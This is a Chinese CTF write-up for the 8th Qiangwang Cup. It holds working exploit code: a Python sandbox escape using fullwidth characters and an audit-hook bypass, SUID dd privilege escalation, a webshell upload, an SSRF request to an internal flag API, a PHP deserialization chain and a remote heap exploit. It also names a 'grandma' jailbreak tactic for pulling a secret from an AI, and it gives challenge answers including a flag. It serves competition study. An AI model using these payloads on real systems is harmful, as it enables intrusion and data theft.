声明
本文作者:CTF战队
本文字数:47064字
阅读时长:约60分钟
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
团队每周会报名参加各类CTF比赛,writeup在公众号更新。
我们建立了一个关于CTF的公开交流群,大家赛后可以交流技巧思路。
❝第八届强网杯全国网络安全挑战赛
https://www.qiangwangbei.com
WEB
积木编程
❝https://pan.baidu.com/s/1YoJN0_he15aY2A-IYLgn1A 提取码(GAME)
from flask import Flask, request, jsonify
import re
import unidecode
import string
import ast
import sys
import os
import subprocess
import importlib.util
import json
# Flask application object for the Blockly-to-Python service.
app = Flask(__name__)
# Keep non-ASCII characters unescaped in JSON responses.
app.config.update(JSON_AS_ASCII=False)

# Character class listing ASCII punctuation only. Look-alike characters
# outside ASCII (for example fullwidth forms) are not matched by it.
blacklist_pattern = r"[!\"#$%&'()*+,-./:;<=>?@[\\\]^_`{|}~]"
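def _path_is_under(path, root):
    """Return True when *path* is *root* itself or lies below it (component-wise)."""
    root = os.path.abspath(root)
    try:
        return os.path.commonpath([os.path.abspath(path), root]) == root
    except ValueError:
        # Raised for paths on different drives; treat as "not under".
        return False


def module_exists(module_name):
    """Report whether *module_name* resolves to a built-in or standard-library module.

    Args:
        module_name: Dotted module name to look up.

    Returns:
        True for names in ``sys.builtin_module_names`` and for modules whose
        file sits under the directory of ``os.__file__`` but not under the
        current working directory; False otherwise, including names that
        cannot be resolved at all.
    """
    try:
        spec = importlib.util.find_spec(module_name)
    except (ImportError, ValueError):
        # find_spec raises for an empty name or a missing parent package;
        # both simply mean "no such module" here.
        return False
    if spec is None:
        return False
    if module_name in sys.builtin_module_names:
        return True

    origin = spec.origin
    # Non-path origins such as "frozen" or "built-in" cannot be located on disk.
    if not origin or not os.path.isabs(origin):
        return False

    # Compare whole path components: a plain startswith() would also accept
    # a sibling directory whose name merely begins with the stdlib path.
    # NOTE(review): on layouts where site-packages is nested under this
    # directory, third-party packages pass as well - confirm that is intended.
    std_lib_path = os.path.dirname(os.__file__)
    return _path_is_under(origin, std_lib_path) and not _path_is_under(origin, os.getcwd())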
def verify_secure(m):
    """Return False if the parsed module *m* contains an import statement.

    Only ``import x`` and ``from x import y`` statements are rejected. Any
    other construct is accepted, so a call such as ``__import__(...)`` (an
    ``ast.Call`` node) or an attribute walk passes this check unchanged.
    """
    for node in ast.walk(m):
        kind = type(node)
        if kind is ast.Import:
            print("ERROR: Banned module ")
            return False
        if kind is ast.ImportFrom:
            print(f"ERROR: Banned module {node.module}")
            return False
    return True
def check_for_blacklisted_symbols(input_text):
    """Return True when *input_text* contains a character from ``blacklist_pattern``.

    The text is inspected exactly as received; no Unicode normalisation or
    transliteration is applied before the search.
    """
    return re.search(blacklist_pattern, input_text) is not None
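def block_to_python(block):
    """Translate one Blockly block, plus any chained ``next`` blocks, into Python source.

    Args:
        block: Dict with a ``type`` key and the ``inputs``/``fields`` that
            type needs; an optional ``next`` entry chains a further block.

    Returns:
        The generated source as a string. Unknown block types, rejected
        text and non-numeric numbers contribute an empty string.
    """
    block_type = block['type']
    code = ''
    if block_type == 'print':
        text = block_to_python(block['inputs']['TEXT']['block'])
        code = f"print({text})"
    elif block_type == 'math_number':
        number = str(block['fields']['NUM'])
        # Every isdecimal() string is parseable by int(); isdigit() also
        # accepts characters such as superscripts, on which int() raises.
        # The result stays a string so that a chained block can be appended
        # below (an int here made the "+=" fail with TypeError).
        code = str(int(number)) if number.isdecimal() else ''
    elif block_type == 'text':
        raw_text = block['fields']['TEXT']
        # NOTE(review): the blacklist is applied to the raw text, but what is
        # written into the generated program is its unidecode()
        # transliteration. Characters absent from the ASCII-only blacklist can
        # therefore turn into quotes or brackets after the check has passed.
        # Validating the transliterated string, or emitting it with repr(),
        # closes that gap. Left as shipped here because this listing is the
        # challenge source the write-up analyses.
        if check_for_blacklisted_symbols(raw_text):
            code = ''
        else:
            code = "'" + unidecode.unidecode(raw_text) + "'"
    elif block_type in ('max', 'min'):
        a = block_to_python(block['inputs']['A']['block'])
        b = block_to_python(block['inputs']['B']['block'])
        code = f"{block_type}({a}, {b})"

    if 'next' in block:
        code += "\n" + block_to_python(block['next']['block']) + "\n"
    return code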
def json_to_python(blockly_data):
    """Generate Python source for the first top-level block of a Blockly workspace.

    Only ``blockly_data['blocks']['blocks'][0]`` is translated; any further
    top-level entries are ignored. The result ends with a newline.
    """
    first_block = blockly_data['blocks']['blocks'][0]
    return block_to_python(first_block) + "\n"
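def do(source_code):
    """Run generated source in a child interpreter and return its stdout.

    The source is parsed, screened by ``verify_secure``, prefixed with an
    audit hook and executed with a five second timeout.

    NOTE(review): the audit hook is installed inside the same interpreter
    that then runs the submitted code, and it looks up ``len`` in builtins on
    every call, so the submitted code can change what the hook sees. Audit
    hooks are a monitoring aid, not an isolation boundary; containment has to
    come from the operating system (unprivileged user, container, seccomp).

    Args:
        source_code: Python source produced by ``json_to_python``.

    Returns:
        The child's decoded stdout, "Timeout!" when the time limit is hit,
        or a fixed refusal message when ``verify_secure`` rejects the code.

    Raises:
        SyntaxError: if *source_code* does not parse.
    """
    import tempfile

    hook_code = '''
def my_audit_hook(event_name, arg):
    blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
    if len(event_name) > 4:
        raise RuntimeError("Too Long!")
    for bad in blacklist:
        if bad in event_name:
            raise RuntimeError("No!")
__import__('sys').addaudithook(my_audit_hook)
'''
    print(source_code)
    tree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)
    if not verify_secure(tree):
        return "Execution aborted due to security concerns."

    # One file per call: with a fixed "run.py", concurrent requests could
    # overwrite or delete each other's script. It stays in the working
    # directory so the child's sys.path[0] is the same as before.
    with tempfile.NamedTemporaryFile('w', suffix='.py', dir=os.getcwd(), delete=False) as f:
        f.write(hook_code + source_code)
        script_path = f.name
    try:
        completed = subprocess.run(['python', script_path], stdout=subprocess.PIPE, timeout=5)
        return completed.stdout.decode("utf-8")
    except subprocess.TimeoutExpired:
        # Only a real timeout is reported as one; other failures propagate to
        # the caller instead of being mislabelled.
        return "Timeout!"
    finally:
        os.remove(script_path)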
@app.route('/')
def index():
    """Serve the static front-end page ``index.html``."""
    page = app.send_static_file('index.html')
    return page
@app.route('/blockly_json', methods=['POST'])
def blockly_json():
    """Accept a Blockly workspace as JSON, turn it into Python and run it.

    Returns the output of ``do`` on success, or a JSON error object when
    code generation or execution raises.
    """
    raw_body = request.get_data()
    print(type(raw_body))
    # NOTE(review): decoding and parsing sit outside the try below, so a
    # malformed body surfaces as an unhandled error rather than the JSON reply.
    workspace = json.loads(raw_body.decode('utf-8'))
    print(workspace)
    try:
        return do(json_to_python(workspace))
    except Exception as e:
        # NOTE(review): str(e) is returned to the client verbatim.
        return jsonify({"error": "Error generating Python code", "details": str(e)})
if __name__ == '__main__':
    # Starts Flask's built-in server listening on every interface (0.0.0.0).
    app.run(host = '0.0.0.0')
全角字符可绕过:黑名单正则只匹配 ASCII 标点,而 unidecode 的转换发生在黑名单检查之后,全角符号通过检查后才被还原成对应的 ASCII 字符。
{
"blocks": {
"blocks": [
{
"type": "print",
"id": "print1",
"inputs": {
"TEXT": {
"block": {
"type": "text",
"id": "text1",
"fields": {
"TEXT": "s"')\nprint(open("/etc/passwd", "r").read())\n#"
}
}
}
}
}
]
}
}
这里只能读取文件,没有读取/flag的权限
hook 函数中,对event_name 长度进行了限制
def my_audit_hook(event_name, arg):
    """Audit hook that raises RuntimeError for long or blacklisted event names.

    Any event name longer than four characters is refused first, so of the
    blacklist entries only the four-character ones ("eval", "exec") can reach
    the second check. ``len`` is resolved from builtins each time the hook
    runs, which means code in the same interpreter can replace it.
    """
    # print(f"[+]{event_name},{arg}")
    blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
    if len(event_name) > 4:
        raise RuntimeError("Too Long!")
    if any(bad in event_name for bad in blacklist):
        raise RuntimeError("No!")
可以看到,这里使用了len函数判断长度是否大于4。我们可以通过重写len函数,让它稳定返回3,就可以绕过第一层长度的过滤
__builtins__.len = lambda x: 3\nprint(len('aaaaa'))
可以看到len函数返回3
随后,我们使用类似于SSTI的payload获取os.system
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")
可以在绕过了event name长度限制后拿到os.system
将二者拼在一起转化成全角字符使用即可执行命令,接下来开始提权读取文件
payload:
{
"blocks": {
"blocks": [
{
"type": "print",
"id": "print1",
"inputs": {
"TEXT": {
"block": {
"type": "text",
"id": "text1",
"fields": {
"TEXT": "s"')\n__builtins__.len = lambda x: 3\n[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("命令")\n#"
}
}
}
}
}
]
}
}
探测SUID文件
find / -perm -u=s -type f 2>/dev/null
发现 dd 命令具有 root 执行权限
可以通过 dd 读取 /flag 文件内容
xiaohuanxiong
题目部分admin 路由未经鉴权可直接访问
/admin/payment.html 处可以修改网站配置,写入一句话木马,使用蚁剑连接
连接后可以在根目录发现 flag 文件
snake
❝做题太无聊,来玩贪吃蛇~
使用脚本可以跑出来分数(欣赏图形化贪吃蛇 多跑几次就会弹出来win)
import http.client
import json
import random
import time
import pygame
# Address and port of the game server.
host = 'eci-2zedfkwha8kfivrlh22r.cloudeci1.ichunqiu.com'
port = 5000

# The four possible moves and the (dx, dy) offset each one applies.
DIRECTIONS = dict(UP=(0, -1), DOWN=(0, 1), LEFT=(-1, 0), RIGHT=(1, 0))

# Start pygame and open a square window; the board is drawn in 20-pixel cells.
pygame.init()
window_size, cell_size = 400, 20
screen = pygame.display.set_mode((window_size, window_size))
pygame.display.set_caption('Snake Game')

# RGB colours used for drawing.
WHITE, BLACK = (255, 255, 255), (0, 0, 0)
GREEN, RED = (0, 255, 0), (255, 0, 0)
def draw_snake(snake):
    """Draw every segment of *snake* as a green cell on the module-level ``screen``."""
    for col, row in snake:
        cell = (col * cell_size, row * cell_size, cell_size, cell_size)
        pygame.draw.rect(screen, GREEN, cell)
def draw_food(food):
    """Draw the food position as a red cell on the module-level ``screen``."""
    col, row = food
    cell = (col * cell_size, row * cell_size, cell_size, cell_size)
    pygame.draw.rect(screen, RED, cell)
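def send_move(direction):
    """POST one move to the game server and return the decoded JSON reply.

    Args:
        direction: Value sent as the ``direction`` field of the JSON body.

    Returns:
        The response body parsed with ``json.loads``.
    """
    payload = json.dumps({"direction": direction})
    # NOTE(review): Accept-Encoding advertises gzip/deflate/br, but the body
    # is decoded as UTF-8 without decompression; this only works while the
    # server answers uncompressed.
    headers = {
        'Content-Type': 'application/json',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36',
        'Accept': '*/*',
        'Origin': f'http://{host}:{port}',
        'Referer': f'http://{host}:{port}/',
        'Accept-Encoding': 'gzip, deflate, br',
        'Cookie': 'session=eyJ1c2VybmFtZSI6InRlc3QifQ.ZyYZAQ.a_hBKR3T7JORnNazAei6qatDLQ4',
        'Connection': 'keep-alive'
    }
    conn = http.client.HTTPConnection(host, port)
    try:
        conn.request("POST", "/move", body=payload, headers=headers)
        data = conn.getresponse().read().decode('utf-8')
    finally:
        # Release the socket even when the request or the read raises.
        conn.close()
    return json.loads(data)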
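def choose_direction(snake, food, board_size=20):
    """Pick the safe move that brings the snake's head closest to the food.

    Args:
        snake: Sequence of segments, head first; candidate cells are compared
            against it as ``[x, y]`` lists.
        food: The food position as an ``(x, y)`` pair.
        board_size: Side length of the square board.

    Returns:
        A key of ``DIRECTIONS`` with the smallest Manhattan distance to the
        food (ties go to the earlier entry of ``DIRECTIONS``), or None when
        every move would hit a wall or the snake itself.
    """
    head_x, head_y = snake[0]
    food_x, food_y = food

    scores = {}
    for direction, (dx, dy) in DIRECTIONS.items():
        new_x, new_y = head_x + dx, head_y + dy
        # Skip moves that leave the board.
        if not (0 <= new_x < board_size and 0 <= new_y < board_size):
            continue
        # Skip moves that run into the snake's own body.
        if [new_x, new_y] in snake:
            continue
        scores[direction] = abs(new_x - food_x) + abs(new_y - food_y)

    # Every safe move was scored above, so an empty dict already means that no
    # safe move exists. The former random fallback repeated the same two
    # checks and could therefore only ever return None.
    if not scores:
        return None
    return min(scores, key=scores.get)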
def main():
    """Play the remote game in a loop, mirroring each server state in the pygame window.

    Each iteration sends the current direction, prints the raw reply, redraws
    the board and picks the next direction. The loop ends only when the
    window is closed.
    """
    direction = 'RIGHT'  # initial direction
    while True:
        response = send_move(direction)
        # Show the raw JSON returned by the server.
        print(response)

        # NOTE(review): on a non-ok status the same direction is re-sent at
        # once, without a pause and without handling window events.
        if response['status'] != 'ok':
            print("Game Over")
            continue

        # Refresh the snake and food positions, then redraw the board.
        snake, food = response['snake'], response['food']
        screen.fill(BLACK)
        draw_snake(snake)
        draw_food(food)
        pygame.display.flip()

        # Decide the next move.
        direction = choose_direction(snake, food)
        # if direction is None:
        #     print("No safe moves left, Game Over")
        #     break

        # Leave when the window is closed.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                return
        # A delay can be added here to slow the game down for observation.
        # time.sleep(0.5)
if __name__ == "__main__":
    # Run the game loop, then shut pygame down once it returns.
    main()
    pygame.quit()
跳转 /snake_win?username=test
http://eci-2zedfkwha8kfivrlh22r.cloudeci1.ichunqiu.com:5000/snake_win?username=1%27union%20select%209999,999,990009--+
有注入,但是改成绩没有用,数据库中没有flag,sqlite
最后肝到半夜,发现居然是SSTI!
platform
❝任何人都能登录的平台
输入任何内容都可以登录,php的,输入的用户名会显示在页面上
源码 www.zip
通过替换字符进行逃逸控制反序列化的内容来执行命令
proxy
❝Proxy what you want
附件下载 提取码(GAME)备用下载
package main
import (
"bytes"
"io"
"net/http"
"os/exec"
"github.com/gin-gonic/gin"
)
// ProxyRequest is the JSON body accepted by POST /v2/api/proxy.
// URL and Method are mandatory (binding:"required"); every field is supplied
// by the caller and is used as given when the outbound request is built.
type ProxyRequest struct {
	URL             string            `json:"url" binding:"required"`
	Method          string            `json:"method" binding:"required"`
	Body            string            `json:"body"`
	Headers         map[string]string `json:"headers"`
	FollowRedirects bool              `json:"follow_redirects"`
}
// main registers the /v1 and /v2 route groups on one gin engine and serves
// them on 127.0.0.1:8769.
func main() {
	r := gin.Default()

	v1 := r.Group("/v1")
	{
		// POST /v1/api/flag runs /readflag and returns its combined output.
		// flag is a []byte, which the JSON encoder renders as a base64 string.
		v1.POST("/api/flag", func(c *gin.Context) {
			cmd := exec.Command("/readflag")
			flag, err := cmd.CombinedOutput()
			if err != nil {
				c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
				return
			}
			c.JSON(http.StatusOK, gin.H{"flag": flag})
		})
	}

	v2 := r.Group("/v2")
	{
		// POST /v2/api/proxy issues an HTTP request on the caller's behalf and
		// relays status, headers and body of the answer.
		// NOTE(review): URL, method, headers and body all come from the request
		// with no allow-list or address check, and the handler runs in the same
		// process that serves /v1 on loopback. If such a proxy has to exist,
		// restrict scheme and host, reject loopback, link-local and private
		// addresses after DNS resolution, and repeat the check on each redirect.
		v2.POST("/api/proxy", func(c *gin.Context) {
			var proxyRequest ProxyRequest
			if err := c.ShouldBindJSON(&proxyRequest); err != nil {
				c.JSON(http.StatusBadRequest, gin.H{"status": "error", "message": "Invalid request"})
				return
			}

			// No Timeout is set on the client. Redirects are followed only
			// when the target URL is absolute and the caller asked for it;
			// otherwise the redirect response itself is returned.
			client := &http.Client{
				CheckRedirect: func(req *http.Request, via []*http.Request) error {
					if !req.URL.IsAbs() {
						return http.ErrUseLastResponse
					}
					if !proxyRequest.FollowRedirects {
						return http.ErrUseLastResponse
					}
					return nil
				},
			}

			req, err := http.NewRequest(proxyRequest.Method, proxyRequest.URL, bytes.NewReader([]byte(proxyRequest.Body)))
			if err != nil {
				c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
				return
			}

			// Caller-supplied headers are copied onto the outbound request as-is.
			for key, value := range proxyRequest.Headers {
				req.Header.Set(key, value)
			}

			resp, err := client.Do(req)
			if err != nil {
				c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
				return
			}
			defer resp.Body.Close()

			// The whole upstream body is read into memory without a size limit.
			body, err := io.ReadAll(resp.Body)
			if err != nil {
				c.JSON(http.StatusInternalServerError, gin.H{"status": "error", "message": "Internal Server Error"})
				return
			}

			c.Status(resp.StatusCode)
			// Only the first value of each upstream header is relayed.
			for key, value := range resp.Header {
				c.Header(key, value[0])
			}
			c.Writer.Write(body)
			c.Abort()
		})
	}

	r.Run("127.0.0.1:8769")
}
发现v1接口无法直接访问,可以用v2proxy做个代理,构造个json请求包
POST /v2/api/proxy HTTP/1.1
Host: 123.56.219.14:28704
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 104
{
"url": "http://127.0.0.1:8769/v1/api/flag",
"method": "POST",
"follow_redirects": true
}
base64解密即可
Password Game
四个限制,要有数字字母,数字和要为一个数的倍数,一个算式结果要出现在字符串中,长度小于一个数,然后就可以得到部分代码,其中包含各种类和主逻辑
// Replace every case-insensitive occurrence of "admin" or "2024qwb" in
// $password with "nonono" and return the result.
// NOTE(review): the caller applies this to the raw serialized string before
// unserialize(). "nonono" differs in length from both matched words, so a
// length-prefixed s:N:"..." field that contained one of them no longer
// matches its declared length afterwards.
function filter($password){
    $filter_arr = array("admin","2024qwb");
    $filter = '/'.implode("|",$filter_arr).'/i';
    return preg_replace($filter,"nonono",$password);
}
class guest{
    public $username;
    public $value;
    // Runs when the object is used as a string. When username equals "guest"
    // it calls the local variable $value, which is never assigned in this
    // method; the property $this->value is not used here.
    public function __tostring(){
        if($this->username=="guest"){
            $value();
        }
        return $this->username;
    }
    // Runs for calls to undefined methods; prints the flag only when username
    // equals the MD5 of the flag.
    public function __call($key,$value){
        if($this->username==md5($GLOBALS["flag"])){
            echo $GLOBALS["flag"];
        }
    }
}
class root{
    public $username;
    public $value;
    // Runs when an undefined or inaccessible property is read.
    // NOTE(review): both comparisons are loose (==). strpos() returns false
    // when "admin" is absent and false == 0 is true, so the first test also
    // passes for usernames that do not contain "admin" at all.
    // On success the flag is stored in $this->value and the MD5 of
    // "hello:" . flag is printed.
    public function __get($key){
        if(strpos($this->username, "admin") == 0 && $this->value == "2024qwb"){
            $this->value = $GLOBALS["flag"];
            echo md5("hello:".$this->value);
        }
    }
}
class user{
    public $username;
    public $password;
    public $value;
    // Runs when the object is called like a function: overwrites username
    // with the MD5 of the flag, then calls guess() on $this->password.
    public function __invoke(){
        $this->username=md5($GLOBALS["flag"]);
        return $this->password->guess();
    }
    // Runs when the object is destroyed and prints "hello" followed by
    // username. The strpos() test is a loose comparison, so it also passes
    // when "admin" does not occur in username (false == 0).
    public function __destruct(){
        if(strpos($this->username, "admin") == 0 ){
            echo "hello".$this->username;
        }
    }
}
// NOTE(review): unserialize() on request data lets the client decide which of
// the classes above is instantiated and with which property values, so their
// magic methods run on client-chosen state. Decode untrusted input with
// json_decode(), or pass ['allowed_classes' => false] to unserialize().
$user=unserialize(filter($_POST["password"]));
// Reading ->username / ->password on an object that lacks the property
// invokes that object's __get(), if it defines one.
if(strpos($user->username, "admin") == 0 && $user->password == "2024qwb"){
    echo "hello!";
}
显然要找一条链子触发反序列化,刚开始定向思维的想user::destruct=>guest::toString=>user::__invoke
接着往下走,但是toString里是$value
而不是$this->value
,这玩意就变成不可控了。
可以看到除了反序列化外,下面还有字符串比较的操作,里面对反序列化出来的$user
取username
和password
变量,可以看到root类中是没有password的,且存在__get方法,那么就可以从这里做开头,从root::get
开始去修改$this->value
为flag,然后通过引用设置user→username为root→value,接着触发user::destruct输出flag
<?php
// Add up every single character of $a that is numeric and return the total.
function sum($a){
    $total = 0;
    foreach (str_split($a) as $ch) {
        if (is_numeric($ch)) {
            $total += $ch;
        }
    }
    return $total;
}
// Copy of the challenge's filter: replaces "admin" and "2024qwb"
// (case-insensitive) with "nonono". It is not called in this script.
function filter($password){
    $filter_arr = array("admin","2024qwb");
    $filter = '/'.implode("|",$filter_arr).'/i';
    return preg_replace($filter,"nonono",$password);
}
// Property-only stand-in for the challenge's guest class (no methods).
class guest{
    public $username;
    public $value;
}
// Property-only stand-in for the challenge's root class.
class root{
    public $username;
    public $value;
    // Extra property that the challenge's root class does not declare.
    public $kk;
}
// Property-only stand-in for the challenge's user class (no methods).
class user{
    public $username;
    public $password;
    public $value;
}
// Build a root object that holds a user object in its extra property.
$x = new root();
$x->username = "akaka";
// Integer 2024; the challenge compares value to "2024qwb" with ==.
// NOTE(review): that loose comparison is only true on PHP versions before 8.
$x->value = 2024;
$x->kk = new user();
// username of the inner object is a reference to the outer object's value,
// so a later change to one is visible through the other.
$x->kk->username = &$x->value;
$x->kk->value = "6007675";
// Two arithmetic results printed for reference - presumably the expressions
// posed by the game's rules; confirm against the challenge page.
echo (26 * 4)."\n";
echo (60101 - 25)."\n";
// Print the serialized object together with its digit sum and its length.
$ser = serialize($x);
echo $ser."\n";
echo sum($ser)."\n";
echo strlen($ser)."\n";
Pwn
baby_heap
[*] '/local/ctf/qwbs8/baby_heap/pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
沙箱,这没禁用 execveat,可以用这个打哈
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x07 0xc000003e if (A != ARCH_X86_64) goto 0009
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x04 0xffffffff if (A != 0xffffffff) goto 0009
0005: 0x15 0x03 0x00 0x00000002 if (A == open) goto 0009
0006: 0x15 0x02 0x00 0x0000003b if (A == execve) goto 0009
0007: 0x15 0x01 0x00 0x00000101 if (A == openat) goto 0009
0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0009: 0x06 0x00 0x00 0x00000000 return KILL
GLIBC 2.35 先整个环境
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.7) stable release version 2.35.
下个 docker 先
docker pull roderickchan/debug_pwn_env:22.04-2.35-0ubuntu3.7-20240421
add 功能:堆块要大于 0x500,基本是 largebin 或者 mmap delete 功能:没有 check,可以多次 free 同一块地址 edit 功能:只能用一次,下标在范围内就能修改,不检查是否释放 show 功能:只能用一次 有两个隐藏功能,一个对env操作,一个可以在任意地址写16个字节,都只能使用一次;该隐藏功能有限制,只能写 libc 段和后面的段,且在 libc 段中,只能写 _IO_2_1_stdin 之前的地址
应该是非预期了,找了个 got 表链子,直接泄漏环境变量
putenv 能触发如下链子
__strncmp_avx2(const char *__s1, const char *__s2, size_t __n) __s1:等于 **environ __s2:等于 putenv 所操作的环境变量名称,不包括等号和内容 __n:等于 putenv 所操作的环境变量名称长度
将其直接改为 printf 泄漏环境变量,一般动态 flag 都依靠环境变量生成,这里直接获取环境变量即可
exp 如下
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import argparse
# Command-line switch: "d"/"debug" starts the local binary, "r"/"remote"
# connects to the remote service.
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--mode", required=True, choices=["d", "debug", "r", "remote"])
args = parser.parse_args()
context(arch="amd64", endian='el', os="linux", terminal=["tmux", "splitw", "-h"])
context.log_level = "debug"
if args.mode in ["d", "debug"]:
    p = process('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
else:
    p = remote('39.106.54.211', 30821)
    # NOTE(review): remote mode also loads the local system libc, so symbol
    # offsets are only right when that file matches the remote build.
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
chall = ELF('./pwn', checksec=False)
def add(_size):
    """Menu option 1: answer the size prompt with *_size*."""
    size_text = f"{_size}".encode()
    p.sendlineafter(b'Enter your choice: ', b'1')
    p.sendlineafter(b'Enter your commodity size \n', size_text)
def delete(_idx):
    """Menu option 2: answer the delete prompt with index *_idx*."""
    index_text = f"{_idx}".encode()
    p.sendlineafter(b'Enter your choice: ', b'2')
    p.sendlineafter(b'Enter which to delete: \n', index_text)
def edit(_idx, _ctx):
    """Menu option 3: send index *_idx*, then *_ctx* as the new content.

    Both arguments are converted with ``str()`` before encoding, so a bytes
    object passed as *_ctx* is sent in its ``b'...'`` textual form.
    """
    index_text = f"{_idx}".encode()
    content_text = f"{_ctx}".encode()
    p.sendlineafter(b'Enter your choice: ', b'3')
    p.sendlineafter(b'Enter which to edit: \n', index_text)
    p.sendlineafter(b'Input the content \n', content_text)
def show(_idx):
    """Menu option 4: return the bytes printed for entry *_idx*.

    Everything received up to and including the next menu header is read, and
    the last six bytes (the header's length) are cut off before returning.
    """
    index_text = f"{_idx}".encode()
    p.sendlineafter(b'Enter your choice: ', b'4')
    p.sendlineafter(b'Enter which to show: \n', index_text)
    p.recvuntil(b'The content is here \n')
    received = p.recvuntil(b'Menu:\n')
    return received[:-6]
def secret():
    """Menu option 5: answer its follow-up prompt with ``2``."""
    for prompt, reply in (
        (b'Enter your choice: ', b'5'),
        (b'Maybe you will be sad !\n', b'2'),
    ):
        p.sendlineafter(prompt, reply)
def oooo(_addr, _ctx):
    """Menu option 10: send *_addr* at the address prompt, then *_ctx* as raw bytes.

    Both values are written with ``send``/``sendafter``, i.e. without a
    trailing newline.
    """
    menu_prompt = b'Enter your choice: '
    addr_prompt = b'Input your target addr \n'
    p.sendlineafter(menu_prompt, b'10')
    p.sendafter(addr_prompt, _addr)
    p.send(_ctx)
# Four allocations, all above 0x500 bytes.
add(0x628)
add(0x618)
add(0x638)
add(0x618)
# gdb.attach(p, 'brva 0x1D23\nb getenv\nb setenv\nb putenv\nc')
# Free entry 1 and read it back: the first 8 bytes returned are treated as a
# pointer into libc, from which the libc base is derived.
delete(1)
libc.address = u64(show(1)[:8]) + 0x9c0 - libc.sym['_IO_2_1_stderr_']
success("libc.address = " + hex(libc.address))
# NOTE(review): 0x9c0, 0x21a118 and 0x539e0 are fixed offsets, valid for one
# libc build only. libc_setcontext is computed but never used below.
libc_got_strlen = libc.address + 0x21a118
libc_setcontext = libc.address + 0x539e0
# Use the one-shot write (menu option 10) to store printf's address at the
# libc offset above. The target lies inside libc's own data, which the Full
# RELRO setting reported for the challenge binary does not cover.
oooo(p64(libc_got_strlen), p64(libc.sym["printf"]))
# Trigger menu option 5 / 2, then hand the session over to the user.
secret()
p.interactive()
❝flag{648fed8f-4c88-4f72-a855-ad444999afbc}
Misc
givemesecret
❝Can you extract the flag from the AI? 请访问 http://ip:port
奶奶哄睡战术~
Master of OSINT
❝本题以百度地图选取的经纬度为准。
这是一个街景挑战,你需要找到提供的街景图片拍摄所在的具体位置。然后在题目页面点击 send 按钮,弹出对话框并输入该位置的经纬度,格式为 longitude,latitude。
当精度达到要求时,即认为你找到了这个地点。总共有 10 个地点,找到其中 9 个即可通过本题。
提交的经纬度应符合 ^-?(\d1,2})?,-?(\d|[1-8]\d|90)(.\d{1,6})?$ 。例如,如果地点为「东方明珠广播电视塔」,那么你可以提交 121.506379,31.245414。
特别注明:请不要攻击本题目的平台,这是违反规则的。
图片中有个风车,附近应该有个风力发电站,搜索风车后,找到一个相似的,是上海崇明长兴风力发电
https://m.weibo.cn/status/DCujLoGq9?from=page_1005055335640503_profile&wvr=6&mod=weibotime&jumpfrom=weibocom
然后在百度地图上找到与之相同的地点
图中的两种路灯+栅栏,可以初步认为这是在江浙。然后通过谷歌识图找到报恩寺塔,最终在百度全景地图锁定内环南线
118.782063,32.013663
首先判断拍摄所处位置应该是在立交或者高速上,再通过上方的那个栅栏,可初步猜测是在杭州。同时因为其宽度并不宽,且看不到收尾,那么上边的不是立交,只可能是铁路或者轻轨,再加上上方路段两旁的应该是高压线,从宽度和接触网来看感觉不似高铁,更像是轻轨线路。下方有许多空调外机,应该是横跨建筑群。右边有个IKEA(宜家)。那就在百度地图上找高铁和立交交错,且附近有宜家的地方,最终锁定杭州绕城高速和9号线交错的地方
120.293219,30.34633
长沙橘子洲大桥
112.967691,28.201726
左边有个宏泰百货,右边高架立柱能看清一个三局,正中间高架上写着"中铁三局集团携手促进浙江经济发展",由于高架上均有高压接触网,那么可以猜测这里至少有三条铁路线交错,很有可能附近还有个高铁站。从浙江铁路网入手,最终锁定杭州南站附近的南秀路
观察图片,图中应该是有水,猜测是湖,且湖和红色屋顶房子在同一边,道路两边分别有黄色和红色的标识物。然后谷歌识图搜到青海湖,通过百度地图在倒湖茶公路上找到那个红色屋顶的小房子。
搜索桥梁图片,应该找到一个很像的,然后点进原文http://mt.sohu.com/20171228/n526620921.shtml,但原文中出现的大桥均不是图片中的,然后逐一查看武汉的长江大桥,发现了天兴洲长江大桥和图片中一模一样。
114.413085,30.659759
